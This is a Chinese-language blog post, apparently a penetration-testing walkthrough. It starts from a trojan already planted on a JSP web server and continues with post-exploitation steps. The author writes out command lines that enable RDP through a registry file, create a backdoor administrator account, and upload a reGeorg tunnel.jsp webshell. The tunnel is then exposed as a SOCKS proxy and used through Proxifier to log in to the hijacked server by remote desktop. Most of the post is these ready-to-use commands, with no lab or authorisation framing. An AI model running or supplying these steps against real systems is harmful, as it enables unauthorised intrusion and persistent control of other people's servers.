背景
已上传木马到服务器,可以用冰蝎连接,服务器也开启了3389端口,关闭了防火墙。但是本机还是没法登陆服务器创建的新用户,于是自己google了一番,学习了一点代理知识。
连接条件
查看系统的权限
判断3389端口是否开启
netstat -ano
如果未开启3389端口
命令行输入
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
命令行添加windos用户并升成管理员权限
net user 用户名 密码 /add 添加用户
eg: net user T1me T1me /add
net localgroup administrators UserName /add 将用户加入到本地组
eg: net localgroup administrators T1me /add
配置 reGeorg
什么样的脚本上传什么类型的脚本,reGeorg里面基本所有类型的网站脚本都有
这里是jsp网站,我上传的是tunnel.jsp。
Note:脚本上传的位置,放在服务器能解析的位置
判断自己脚本的状态,访问自己的脚本,出现上述字样说明这个脚本可用
自己的主机输入如下命令,这段命令将远程代理映射到本地2333端口
python reGeorgSocksProxy.py -l 0.0.0.0 -p 2333 -u 目标网站
eg:python reGeorgSocksProxy.py -l 0.0.0.0 -p 2333 -u http://xxx.xxx.xxx.xxx/uploadFile/driver/2019-09-13/tunnel.jsp
出现上述界面就可以用代理软件了
利用proxifier进行socks5代理
首先是设置代理服务器
代理服务器设置,这里填2333端口因为我先前代理的端口是2333
接下来是设置代理规则
代理规则设置如下
这里应用程序本来是任意程序,这里只需要添加mstsc.exe(远程桌面连接程序)就行
代理完成后,其他的把对钩去掉就行
远程桌面连接
然后就进行远程桌面连接服务器,填写的就是服务器地址,这里我保存过登陆凭据了不用登陆了
参考链接:
https://blog.csdn.net/limb0/article/details/103863534
https://www.k0rz3n.com/2018/07/06/如何使用reGeorg+Proxifier渗透内网/